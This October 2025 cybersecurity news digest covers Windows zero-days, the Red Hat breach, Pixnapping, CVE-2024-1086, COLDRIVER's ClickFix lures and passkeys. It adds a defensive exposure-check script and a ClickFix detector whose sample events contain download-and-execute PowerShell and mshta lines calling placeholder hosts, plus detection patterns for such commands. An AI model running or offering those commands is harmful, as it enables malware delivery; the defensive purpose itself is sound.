This Month in Cybersecurity - October 2025

1. Windows Zero-Day Actively Exploited to Target European Diplomats

Two distinct, severe Windows vulnerabilities are under active exploitation. The first is an unpatched Windows Shortcut (.lnk) zero-day, CVE-2025-9491, that multiple nation-state APT groups have quietly exploited for espionage since 2017; a China-aligned group recently used it against European diplomats, hiding the PlugX malware behind malicious shortcut files. The flaw lets a crafted shortcut conceal its real command line from the Windows user interface, so inspecting a shortcut's target before opening it is not a reliable defence; blocking or quarantining .lnk files from untrusted sources is. The second is a critical, potentially wormable flaw in Windows Server Update Services (WSUS), CVE-2025-59287, which Microsoft's October update did not fully fix and which required an out-of-band patch; it is now being opportunistically exploited to drop information-stealing malware on unpatched, internet-facing WSUS servers. Until the out-of-band update is applied, Microsoft's listed workarounds are to disable the WSUS Server Role or block inbound traffic to TCP ports 8530 and 8531, and a WSUS server should not be reachable from the internet in any case.

Date: Oct 31, 2025
Source: Ars Technica
Author: Dan Goodin

2. Red Hat Consulting Hit by Data Breach After GitLab Instance is Compromised

The Crimson Collective extortion group claimed responsibility for a security breach at Red Hat, saying it stole nearly 570GB of data, including around 800 Customer Engagement Reports (CERs), from a self-managed GitLab instance used exclusively by Red Hat Consulting. Red Hat confirmed the breach, stating that it has secured the instance and is investigating, but did not verify the full extent of the data theft or the attackers' claim that the CERs, which can contain sensitive infrastructure details and authentication tokens for major organizations such as Bank of America, AT&T and U.S. government entities, could be used to reach downstream customer networks. Red Hat maintains that the incident is isolated to its consulting business and has not affected its other products or its software supply chain, and it is now notifying affected customers. Any organization that had a consulting engagement should treat credentials, tokens and network details recorded in its CERs as exposed and rotate them rather than wait for confirmation of which reports were taken.

Date: Oct 2, 2025
Source: BleepingComputer
Author: Lawrence Abrams

3. German Refusal Blocks EU Chat Control Law

In a significant win for digital privacy advocates, the German government refused to support the EU's controversial Chat Control regulation, denying the proposal the required majority in the EU Council and stopping the mass surveillance law from passing at the vote planned for the following week. The refusal followed massive public pressure, which led even conservative leaders such as Jens Spahn (CDU/CSU) to publicly oppose the unwarranted monitoring of private chats. Digital rights activist Dr. Patrick Breyer celebrated the outcome, crediting it to relentless protest from citizens and organizations, but warned that the fight is "far from over." He called on EU Commission President Ursula von der Leyen to withdraw the "dystopian" bill entirely and adopt the European Parliament's alternative, which focuses on effective child protection through "Security by Design" and proactive content clearing instead of mass surveillance.

Date: Oct 8, 2025
Source: Patrick Breyer
Author: Patrick Breyer

4. New Pixnapping Attack Steals 2FA Codes and Private Data from Android Devices

A new attack called Pixnapping allows a malicious app installed on an Android device to covertly steal sensitive visual data displayed by other apps, such as two-factor authentication (2FA) codes and chat messages.

The attack requires the victim to install a malicious app, but that app needs no special system permissions, so Android's permission prompts give no warning. Pixnapping exploits a side channel, specifically the data-dependent time it takes to render a frame, that lets the malicious app infer the color of individual pixels drawn by the target app, effectively taking a screenshot one pixel at a time. Researchers demonstrated that the attack could steal a 6-digit Google Authenticator code in under 30 seconds on various Pixel models, with a success rate of up to 73%. Google released partial mitigations, but the researchers found that a modified version of the attack still worked, so the practical defence for now is keeping untrusted apps off devices that hold authenticators.

Date: Oct 13, 2025
Source: Ars Technica
Author: Dan Goodin

5. CISA: High-severity Linux flaw now exploited by ransomware gangs

CVE-2024-1086, a high-severity privilege-escalation flaw in the Linux kernel's netfilter nf_tables subsystem, is now being actively exploited in ransomware attacks. The bug is a use-after-free that has been in the kernel since 2014; an attacker who already has local, unprivileged code execution can use it to gain root, take full control of the system, disable security tooling and deploy malware. A public proof-of-concept (PoC) exploit released in March 2024 demonstrated reliable exploitation against major distributions including Debian, Ubuntu and Red Hat. The upstream fix was merged in January 2024 and has long been backported by distributions, so a host still exposed today is one that has not rebooted into a patched kernel; where patching must wait, preventing the nf_tables module from loading or disabling unprivileged user namespaces removes the preconditions the public exploit relies on.
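The following triage script is an added example, not code from the article or from any of the sources it cites. It checks the two preconditions that the public PoC for CVE-2024-1086 depends on (this dependency is an assumption about that exploit, not a statement the article makes): the nf_tables module being reachable, and unprivileged user namespaces being allowed, which is how an unprivileged process obtains CAP_NET_ADMIN in a fresh network namespace. It deliberately does not try to judge patch status from the kernel version string, because distribution kernels backport the fix without changing the upstream version number.

```python
"""Exposure triage for CVE-2024-1086 (nf_tables use-after-free) on a Linux host.

Added example. Reads the same kernel interfaces an administrator would
inspect by hand and reports whether the public exploit's preconditions hold.
It does NOT determine whether the running kernel is patched; use your
distribution's advisory for that.
"""
import glob
import re
from typing import Dict, Optional

# Only an `install nf_tables /bin/true|false` rule stops the kernel from
# auto-loading the module on demand; a plain `blacklist` line only affects
# alias-based loading and is not counted as an effective mitigation here.
_INSTALL_RULE = re.compile(r"^\s*install\s+nf_tables\s+/bin/(?:true|false)\b", re.M)


def nf_tables_loaded(proc_modules: str) -> bool:
    """True if nf_tables is listed in /proc/modules (or lsmod output).

    Caveat: a kernel with nf_tables built in (CONFIG_NF_TABLES=y) will not
    list it here; check modules.builtin for that case.
    """
    for line in proc_modules.splitlines():
        if line.strip() and line.split()[0] == "nf_tables":
            return True
    return False


def nf_tables_blocked(modprobe_conf: str) -> bool:
    """True if modprobe.d contains an install rule that neutralises nf_tables."""
    return _INSTALL_RULE.search(modprobe_conf) is not None


def unprivileged_userns_allowed(max_user_namespaces: str,
                                unprivileged_userns_clone: Optional[str] = None,
                                apparmor_restrict: Optional[str] = None) -> bool:
    """Interpret the sysctl knobs that govern unprivileged user namespaces.

    user.max_user_namespaces == 0 disables them on any kernel;
    kernel.unprivileged_userns_clone == 0 disables them on Debian-derived kernels;
    kernel.apparmor_restrict_unprivileged_userns == 1 confines them on recent Ubuntu.
    None means the knob does not exist on this kernel.
    """
    if int(max_user_namespaces.strip()) == 0:
        return False
    if unprivileged_userns_clone is not None and int(unprivileged_userns_clone.strip()) == 0:
        return False
    if apparmor_restrict is not None and int(apparmor_restrict.strip()) == 1:
        return False
    return True


def assess(proc_modules: str, modprobe_conf: str, max_user_ns: str,
           userns_clone: Optional[str] = None,
           apparmor_restrict: Optional[str] = None) -> Dict[str, bool]:
    """Combine the checks; the PoC needs nf_tables reachable AND userns allowed."""
    loaded = nf_tables_loaded(proc_modules)
    blocked = nf_tables_blocked(modprobe_conf)
    userns = unprivileged_userns_allowed(max_user_ns, userns_clone, apparmor_restrict)
    # An install rule is useless once the module is already loaded.
    reachable = loaded or not blocked
    return {
        "nf_tables_loaded": loaded,
        "nf_tables_install_blocked": blocked,
        "unprivileged_userns_allowed": userns,
        "poc_preconditions_met": reachable and userns,
    }


def _read(path: str) -> Optional[str]:
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


def main() -> None:
    modprobe = "".join(_read(p) or "" for p in sorted(glob.glob("/etc/modprobe.d/*.conf")))
    result = assess(
        _read("/proc/modules") or "",
        modprobe,
        _read("/proc/sys/user/max_user_namespaces") or "0",
        _read("/proc/sys/kernel/unprivileged_userns_clone"),
        _read("/proc/sys/kernel/apparmor_restrict_unprivileged_userns"),
    )
    for key, value in result.items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main()
```

Run it as root on the host being triaged; a `poc_preconditions_met: True` result on an unpatched kernel is the condition to act on, and a `False` result only says the public exploit is blocked, not that the kernel bug is fixed.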

Date: Oct 31, 2025
Source: BleepingComputer
Author: Sergiu Gatlan

6. Russian Coldriver Hackers Rapidly Deploy Three New Malware Families to Evade Detection

COLDRIVER has quickly replaced its previously exposed LOSTKEYS information stealer with a new, rapidly refined set of malware families, collectively codenamed the "ROBOT" family (NOROBOT, YESROBOT and MAYBEROBOT). Observed since May 2025, the new attack chain marks a tactical shift: rather than relying solely on credential phishing against high-profile individuals, it uses "ClickFix-style" lures, a fake CAPTCHA prompt that tricks the user into pasting and executing a malicious PowerShell command. The infection begins with an HTML lure dubbed COLDCOPY that drops the NOROBOT DLL, which in turn fetches and executes the next stage, initially a Python backdoor (YESROBOT) and later a more refined PowerShell implant (MAYBEROBOT). The rapid development tempo and quick tool replacement (within five days of the LOSTKEYS disclosure) suggest that COLDRIVER adapts swiftly to security researchers' public findings. Because the user, not an exploit, runs the first command, the telemetry to watch is a scripting host spawned directly from the desktop shell with a download-and-execute command line.
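The detection below is an added example, not part of The Hacker News article and not COLDRIVER indicators from Google's report. It scores process-creation events for the pattern a ClickFix lure produces: a scripting host (PowerShell, mshta, cmd and the like) launched directly from explorer.exe, which is what happens when a user pastes a command into the Win+R Run box, combined with command-line features such as encoded commands, hidden windows, and download-and-execute constructs. The events are constructed JSON lines using Sysmon-style field names (Image, ParentImage, CommandLine, User); the field layout, the hostnames and the weights are assumptions, and in a real deployment you would feed it the Sysmon Event ID 1 or EDR equivalent.

```python
"""Heuristic detection of ClickFix-style execution from process-creation events.

Added example. The sample events are constructed, not real telemetry, and
the indicator weights are a starting point to tune, not a vendor rule.
"""
import json
import re
from typing import Dict, Iterable, List

# A Run-box paste is a child of the desktop shell; scripts launched by an
# admin from a terminal have cmd.exe / a terminal host as parent instead.
USER_SHELL_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (weight, pattern): things a lure needs that an interactive user rarely types.
INDICATORS = [
    (2, re.compile(r"-(?:e|en|enc|encodedcommand)\b", re.I)),        # base64 payload
    (2, re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),         # remote HTA
    (1, re.compile(r"\biex\b|invoke-expression", re.I)),              # run fetched text
    (1, re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)),
    (1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),      # hide the window
    (1, re.compile(r"https?://", re.I)),                              # any remote source
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score(event: Dict[str, str]) -> int:
    """Return the summed indicator weight, or 0 when the parent/child shape does not fit."""
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0
    if _basename(event.get("ParentImage", "")) not in USER_SHELL_PARENTS:
        return 0
    cmd = event.get("CommandLine", "")
    return sum(weight for weight, pattern in INDICATORS if pattern.search(cmd))


def detect(json_lines: Iterable[str], threshold: int = 2) -> List[Dict[str, object]]:
    """Parse JSON-line events and return those at or above the alert threshold."""
    hits = []
    for line in json_lines:
        if not line.strip():
            continue
        event = json.loads(line)
        s = score(event)
        if s >= threshold:
            hits.append({"user": event.get("User"), "score": s,
                         "cmd": event.get("CommandLine")})
    return hits


# Constructed sample telemetry (hostnames are placeholders, not real IOCs).
SAMPLE_EVENTS = [
    json.dumps({"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell -w hidden -c \"iex (iwr http://captcha-verify.example/v.txt).Content\""}),
    json.dumps({"User": "CORP\\bob", "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell.exe"}),                      # user opened a shell
    json.dumps({"User": "CORP\\svc-backup", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}),
    json.dumps({"User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\mshta.exe",
                "CommandLine": "mshta https://cdn-check.example/captcha.hta"}),
    json.dumps({"User": "CORP\\dave", "ParentImage": "C:\\Windows\\explorer.exe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell -enc SQBFAFgAIAAuAC4ALgA="}),  # constructed base64
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{hit['score']:>2}  {hit['user']}  {hit['cmd']}")
```

The parent-process condition does the heavy lifting: the same command lines launched from a terminal or a scheduled task score zero here, which keeps the rule quiet on administrators, while anything a user pasted into the Run box that reaches out to the network is surfaced for review.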

Date: Oct 21, 2025
Source: The Hacker News
Author: Ravie Lakshmanan

7. Germany Positions Passkeys as the Nation’s Primary Secure Authentication Standard

Germany's Federal Office for Information Security (BSI) has launched an initiative to establish passkeys as the country's primary authentication method, viewing them as significantly more secure, more user-friendly, and more resistant to phishing and man-in-the-middle attacks than traditional passwords. The BSI's plan, set out in new draft guidelines, seeks to standardize the use of both device-bound and synced passkeys. Each passkey is a unique public/private key pair per account and site, so credentials cannot be reused across services, and the private key never leaves the authenticator; because the signed login response is bound to the legitimate site's origin, a look-alike phishing site cannot replay it. Device-bound passkeys additionally tie authentication to an approved device, whereas synced passkeys trade some of that assurance for recoverability. While the BSI acknowledges the challenge of low public familiarity and adoption (only 38% of people were familiar with passkeys in 2024), it is moving forward, in line with the industry trend exemplified by Microsoft, which began making passkeys the default for new accounts in May 2025.

Date: Oct 01, 2025
Source: Tech Radar
Author: Craig Hale

8. The European Cybersecurity Month (ECSM)

This year's campaign focused heavily on combating phishing, which remains the primary initial intrusion method in approximately 60% of cyberattacks. The campaign highlighted the evolving nature of phishing, noting the rise of "Phishing-as-a-Service" platforms and the concerning use of Large Language Models (LLMs) and AI to create highly convincing scams, which reportedly accounted for over 80% of observed social engineering activity worldwide by early 2025. Under its long-running motto "#THINKB4UCLICK," the initiative provided up-to-date security guidance and also promoted cybersecurity careers, to help close the sector's skills gap, through events such as the European Cybersecurity Challenge.

Date: Oct 01, 2025
Source: European Commission
Author: European Commission

Conclusion

That wraps up this edition! We’d love to hear your thoughts. Don’t hesitate to share any comments or additional news we might have missed. :tada:
